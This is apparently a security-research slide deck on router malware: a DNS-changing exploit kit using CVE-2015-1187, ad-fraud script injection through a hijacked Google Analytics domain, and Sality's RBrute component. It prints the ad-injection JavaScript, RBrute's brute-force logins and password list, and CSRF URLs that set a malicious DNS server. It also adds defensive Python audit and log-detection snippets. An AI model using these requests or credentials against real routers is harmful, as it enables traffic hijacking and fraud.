<section id="_exploit_kit_cve"><h2>Exploit Kit - CVE</h2><div class="ulist"><ul><li><p>CVE-2015-1187</p></li><li><p>D-Link DIR-636L</p></li><li><p>Remote Command Injection</p></li><li><p>Incorrect Authentication</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Another improvement is the implementation of exploits.</p></li><li><p>A CVE is a documented vulnerability that carries a number and is known to the public.</p></li><li><p>One of the exploits added to the EK targets CVE-2015-1187 and affects certain models of the D-Link range.</p></li><li><p>It allows code execution through a command because of an authentication flaw.</p></li><li><p>Other exploits target much older bugs such as CVE-2008-1244, which is 7 years old.</p></li><li><p>If the operator took the time to exploit such an old bug, one can easily assume it works rather well.</p></li></ul></div></aside></section>
<section id="_recap"><h2>Recap</h2><div class="ulist"><ul><li><p>Exploit Kit</p></li><li><p>Change DNS</p></li><li><p>Fileless</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>We have an EK that changes the router's DNS, leaves no files behind, and is cross-platform</p></li><li><p>What can they do with it?</p></li></ul></div></aside></section>
<section id="_what_can_they_do"><h2>What Can They Do?</h2><div class="ulist"><ul><li><p>Universal XSS on all HTTP sites fetching Javascript on a 3rd party domain</p></li><li><p>Phishing</p></li><li><p>Adfraud</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Every resource the browser fetches over HTTP can potentially be
replaced with whatever the attacker chooses</p></li><li><p>Generally: phishing, adfraud</p></li><li><p>Which third-party Javascript script do you think is the most
popular?</p></li></ul></div></aside></section>
<section id="_you_said_adfraud"><h2>You Said Adfraud?</h2><div class="ulist"><ul><li><p>Injection via Google analytics domain hijacking</p></li><li><p>Javascript runs in context of every page</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Par exemple l’Injection via Google analytics domain hijacking</p></li><li><p>Le javascript des pages qui ont du Google analytics est remplacé par du javascript malicieux</p></li><li><p>En l’occurence injecter des iframes dans des pubs ou remplacer des pubs existantes par des pubs qui lui rapporte</p></li></ul></div></aside></section>
<section id="_exemple_of_google_analytics_substitution"><h2>Example of Google Analytics Substitution</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>'adcash': function() {
var adcash = document.createElement('script');
adcash.type = 'text/javascript';
adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944';
document.body.appendChild(adcash);
},</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>For example, this function lets it add third-party JavaScript.</p></li></ul></div></aside></section>
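<section id="_added_example_http_script_audit"><p>Added example (not code from the talk or from the exploit kit): a Python audit that lists the scripts a page fetches over plain HTTP from a third-party host, which is exactly the condition under which a hijacked resolver lets an attacker substitute them, as with the Google Analytics substitution above. The page URL and the sample HTML are constructed.</p>

```python
"""Audit a page for third-party scripts fetched over plain HTTP, the condition
under which a hijacked resolver lets an attacker substitute the script (the
Google Analytics case above). Added example; sample HTML is constructed."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class ScriptCollector(HTMLParser):
    """Collect the src attribute of every script start tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.srcs.append(src)


def substitutable_scripts(page_url, html):
    """Return absolute URLs of scripts that resolve to http:// on a host other
    than the page's own. Protocol-relative '//host/x.js' on an http page counts,
    since it inherits the page's scheme."""
    collector = ScriptCollector()
    collector.feed(html)
    page_host = urlparse(page_url).hostname
    flagged = []
    for src in collector.srcs:
        absolute = urljoin(page_url, src)
        parts = urlparse(absolute)
        if parts.scheme == "http" and parts.hostname != page_host:
            flagged.append(absolute)
    return flagged


# Constructed sample. Tags are assembled from fragments so that no live
# script tag appears if this snippet is embedded in an HTML page.
SAMPLE_HTML = "".join("<" + fragment for fragment in (
    "html>", "head>",
    'script src="http://www.google-analytics.com/ga.js">', "/script>",
    'script src="https://code.jquery.com/jquery.js">', "/script>",
    'script src="/static/app.js">', "/script>",
    'script src="//cdn.example.net/lib.js">', "/script>",
    "/head>", "/html>",
))
```
</section>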
<section data-background="images/hf/rbrute.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>When discussing malware, it is hard not to talk about Windows.</p></li><li><p>In late 2013 / early 2014, our colleague Benjamin discovered a new Sality component, RBrute.</p></li><li><p>As a reminder, Sality is a P2P botnet that mainly sends spam.</p></li><li><p>This new component gives the botnet a new attack angle through router infection.</p></li><li><p>The goal of this component is to infect the machine with the botnet</p></li></ul></div></aside></section>
<section id="_win32_rbrute_cont"><h2>Win32/RBrute (cont.)</h2><div class="ulist"><ul><li><p>Tries to find administration web pages (IP)</p></li><li><p>Scan and report</p></li><li><p>Router model is extracted from the realm attribute of the HTTP authentication</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>RBrute first retrieves a list of IPs to scan from the C&amp;C.</p></li><li><p>It scans these IPs and reports its findings.</p></li><li><p>It includes the router model in the report.</p></li><li><p>To find the router model, it reads the realm attribute of the HTTP authentication challenge.</p></li></ul></div></aside></section>
<section id="_win32_rbrute_targets"><h2>Win32/RBrute Targets</h2><div class="listingblock"><div class="content"><pre class="highlight"><code class="shell language-shell">$ strings rbrute.exe
[...]
TD-W8901G
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-W8961ND
TD-8816
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
ZXV10 W300
[...]
DSL-2520U
DSL-2600U
DSL router
TD-W8901G
TD-W8901G 3.0
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-8840T 2.0
TD-W8961ND
TD-8816
TD-8817 2.0
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
[...]</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>The list of supported routers is easy to find in the binary with the strings command.</p></li><li><p>This is a non-exhaustive list; we can see that D-Link, TP-Link and ZTE routers are targeted.</p></li></ul></div></aside></section>
<section id="_win32_rbrute_bruteforce"><h2>Win32/RBrute Bruteforce</h2><div class="ulist"><ul><li><p>Logins: <code>admin</code>, <code>support</code>, <code>root</code> & <code>Administrator</code></p></li><li><p>Password list retrieved from the CnC</p></li></ul></div>
<div class="listingblock"><div class="content"><pre class="highlight"><code><empty string>
111111
12345
123456
12345678
abc123
admin
Administrator
consumer
dragon
gizmodo
iqrquksm
letmein
lifehack
monkey
password
qwerty
root
soporteETB2006
support
tadpassword
trustno1
we0Qilhxtx4yLGZPhokY</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Once the report is sent, the C&amp;C returns a list of passwords.</p></li><li><p>Combined with the logins hard-coded in the binary, it brute-forces the router's authentication form.</p></li></ul></div></aside></section>
<section id="_win32_rbrute_changing_dns"><h2>Win32/RBrute Changing DNS</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Save
http://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=<malicious_DNS>&dnsSecondary=8.8.8.8</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Finally, it uses a CSRF to change the primary and secondary DNS.</p></li><li><p>The requests are fairly self-explanatory, as we can see.</p></li></ul></div></aside></section>
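<section id="_added_example_rbrute_log_detection"><p>Added example, not tooling from the talk or from ESET: a Python detection that looks for the two RBrute steps above in a router's HTTP access log, a burst of 401s with the hard-coded logins followed by a request that sets a resolver outside an allowlist (the parameter names are those of the three requests shown). The log format (Common Log Format with the auth-user field), the resolver allowlist and the sample lines are constructed.</p>

```python
"""Spot an RBrute-style credential sweep followed by a DNS change in a router's
HTTP access log. Added example; log format and sample lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

RBRUTE_LOGINS = {"admin", "support", "root", "Administrator"}  # from the talk
EXPECTED_DNS = {"192.0.2.53", "8.8.8.8"}  # assumed legitimate resolvers
DNS_PARAMS = ("dnsserver", "dnsserver2", "dnsPrimary", "dnsSecondary")  # talk's URLs
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "\S+ (\S+) \S+" (\d{3})')


def dns_values(target):
    """Yield resolver values a request target sets (also the '/&param=' form)."""
    parsed = urlparse(target)
    query = parsed.query or parsed.path.partition("&")[2]
    for param, values in parse_qs(query).items():
        if param in DNS_PARAMS:
            yield from values


def analyze(log_lines, min_failures=3):
    """Per source IP: 'brute' = 401s with RBrute logins (reported once it
    reaches min_failures), 'dns_change' = resolvers outside EXPECTED_DNS."""
    failures = defaultdict(int)
    findings = defaultdict(dict)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, user, target, status = m.groups()
        if status == "401" and user in RBRUTE_LOGINS:
            failures[ip] += 1
            if failures[ip] >= min_failures:
                findings[ip]["brute"] = failures[ip]
        for value in dns_values(target):
            if value not in EXPECTED_DNS:
                findings[ip].setdefault("dns_change", []).append(value)
    return dict(findings)


SAMPLE_LOG = [  # constructed; 198.51.100.7 plays the infected client
    '198.51.100.7 - admin [02/Apr/2014:10:00:01 +0000] "GET / HTTP/1.1" 401 0',
    '198.51.100.7 - support [02/Apr/2014:10:00:02 +0000] "GET / HTTP/1.1" 401 0',
    '198.51.100.7 - root [02/Apr/2014:10:00:03 +0000] "GET / HTTP/1.1" 401 0',
    '198.51.100.7 - admin [02/Apr/2014:10:00:04 +0000] "GET /dnscfg.cgi?dnsPrimary=203.0.113.9&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1 HTTP/1.1" 200 0',
    '198.51.100.7 - admin [02/Apr/2014:10:00:05 +0000] "GET /&dnsserver=203.0.113.9&dnsserver2=8.8.8.8&Save=Save HTTP/1.1" 200 0',
    '192.0.2.10 - admin [02/Apr/2014:10:05:00 +0000] "GET /status.html HTTP/1.1" 200 2048',
]
```
</section>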
<section id="_win32_rbrute_next_step"><h2>Win32/RBrute Next Step</h2><div class="ulist"><ul><li><p>Simple redirection to fake Chrome installer (Facebook or Google domains)</p></li><li><p>Install (user action required)</p></li><li><p>Change primary DNS on the computer (via registry key)</p></li></ul></div>
<div class="listingblock"><div class="content"><pre class="highlight"><code>HKLM/SYSTEM/ControlSet001/Services/Tcpip/Parameters/Interfaces/{network interface UUID}/NameServer = “8.8.8.8”</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>From now on, every time the user tries to go to Facebook or Google, they are automatically redirected to a fake Chrome installer page</p></li><li><p>Installing the fake Chrome still requires user action</p></li><li><p>After installation, Sality changes the Windows DNS via the registry key.</p></li></ul></div></aside></section>
<section id="_why_reinfect_someone_by_rbrute_and_not_sality"><h2>Why reinfect someone by RBrute and not Sality?</h2><aside class="notes"><div class="paragraph"><p>Why infect a user with RBrute when they could be infected with Sality?</p></div></aside></section>
<section id="_win32_rbrute_in_a_coffee_shop"><h2>Win32/RBrute In A Coffee Shop</h2><div class="ulist"><ul><li><p>Infected user</p></li><li><p>Infected router</p></li><li><p>Everyone is infected</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Let's imagine for a moment that the user in question is in an internet café.</p></li><li><p>A user connects to the Wi-Fi.</p></li><li><p>They get infected by RBrute, accidentally or not.</p></li><li><p>It changes the router's DNS.</p></li><li><p>Thereby redirecting everyone using the Wi-Fi</p></li><li><p>This makes it easy to infect victims it could not otherwise have reached.</p></li></ul></div></aside></section>
<section id="_rbrute_and_sality"><h2>RBrute and Sality</h2><div class="paragraph"><p><span class="image"><img src="images/hf/sality_overall.png" alt="sality overall" /></span></p></div>
<aside class="notes"><div class="ulist"><ul><li><p>This chart shows the detection rate of Sality.</p></li><li><p>The peak around Dec. 2013 corresponds to the release of the new component.</p></li><li><p>Keep in mind that the attack is aggressive compared to Moose (4 logins, 10 passwords).</p></li></ul></div></aside></section>
<section id="_conclusion"><h2>Conclusion</h2><div class="paragraph"><p>Embedded malware</p></div>
<div class="ulist"><ul><li><p>Not yet complex</p></li><li><p>Tools and processes need to catch up</p></li><li><p>a low hanging fruit</p></li><li><p>Prevention simple</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Threats are not as advanced or complex as their Windows counterparts</p></li><li><p>Our tools, visibility and processes will need to be improved</p></li><li><p>Routers and IoT industry are a low hanging fruit for malware operators these days</p></li><li><p>Often times prevention is as simple as changing your default username and password for a strong one</p><div class="ulist"><ul><li><p>That is, until there is another shellshock affecting all Linux-based
routers…​</p></li></ul></div></li><li><p>Friends don’t let friends run routers with default credentials</p></li></ul></div></aside></section>
<section id="_thanks"><h2>Thanks!</h2><div class="ulist"><ul><li><p>Thank you!</p></li><li><p>Special thanks to ESET Canada Research Team</p></li></ul></div></section>
<section id="_questions" data-background="#125F79"><h2>Questions?</h2><div class="listingblock oversize4"><div class="content"><pre class="highlight"><code>@obilodeau
@nyx__o</code></pre></div></div></section>
<section id="_references"><h2>References</h2><div class="ulist"><ul><li><p><a href="http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf" class="bare">http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf</a></p></li><li><p><a href="http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html" class="bare">http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html</a></p></li><li><p><a href="https://gist.github.com/josephwegner/1d20f1ce1d59b61172e1" class="bare">https://gist.github.com/josephwegner/1d20f1ce1d59b61172e1</a></p></li><li><p><a href="http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/" class="bare">http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/</a></p></li></ul></div></section></div></div><script src="reveal.js/lib/js/head.min.js"></script><script src="reveal.js/js/reveal.js"></script><script>// See https://github.com/hakimel/reveal.js#configuration for a full list of configuration options
Reveal.initialize({
// Display controls in the bottom right corner
controls: false,
// Display a presentation progress bar
progress: true,
// Display the page number of the current slide
slideNumber: false,
// Push each slide change to the browser history
history: true,
// Enable keyboard shortcuts for navigation
keyboard: true,
// Enable the slide overview mode
overview: true,
// Vertical centering of slides
center: true,
// Enables touch navigation on devices with touch input
touch: true,
// Loop the presentation
loop: false,
// Change the presentation direction to be RTL
rtl: false,
// Turns fragments on and off globally
fragments: true,
// Flags if the presentation is running in an embedded mode,
// i.e. contained within a limited portion of the screen
embedded: false,
// Number of milliseconds between automatically proceeding to the
// next slide, disabled when set to 0, this value can be overwritten
// by using a data-autoslide attribute on your slides
autoSlide: 0,
// Stop auto-sliding after user input
autoSlideStoppable: true,
// Enable slide navigation via mouse wheel
mouseWheel: false,
// Hides the address bar on mobile devices
hideAddressBar: true,
// Opens links in an iframe preview overlay
previewLinks: false,
// Theme (e.g., beige, black, blood, league, moon, night, serif, simple, sky, solarized, white)
// NOTE setting the theme in the config no longer works in reveal.js 3.x
//theme: Reveal.getQueryHash().theme || 'owasp',
// Transition style (e.g., none, fade, slide, convex, concave, zoom)
transition: Reveal.getQueryHash().transition || 'none',
// Transition speed (e.g., default, fast, slow)
transitionSpeed: 'default',
// Transition style for full page slide backgrounds (e.g., none, fade, slide, convex, concave, zoom)
backgroundTransition: 'slide',
// Number of slides away from the current that are visible
viewDistance: 3,
// Parallax background image (e.g., "'https://s3.amazonaws.com/hakim-static/reveal-js/reveal-parallax-1.jpg'")
parallaxBackgroundImage: '',
// Parallax background size in CSS syntax (e.g., "2100px 900px")
parallaxBackgroundSize: '',
// The "normal" size of the presentation, aspect ratio will be preserved
// when the presentation is scaled to fit different resolutions. Can be
// specified using percentage units.
width: 960,
height: 700,
// Factor of the display size that should remain empty around the content
margin: 0.01,
// Bounds for smallest/largest possible scale to apply to content
minScale: 0.2,
maxScale: 1.5,
// Optional libraries used to extend on reveal.js
dependencies: [
{ src: 'reveal.js/lib/js/classList.js', condition: function() { return !document.body.classList; } },
{ src: 'reveal.js/plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
{ src: 'reveal.js/plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
{ src: 'reveal.js/plugin/highlight/highlight.js', async: true, callback: function() { hljs.initHighlightingOnLoad(); } },
{ src: 'reveal.js/plugin/zoom-js/zoom.js', async: true, condition: function() { return !!document.body.classList; } },
{ src: 'reveal.js/plugin/notes/notes.js', async: true, condition: function() { return !!document.body.classList; } }
]
});</script></body></html>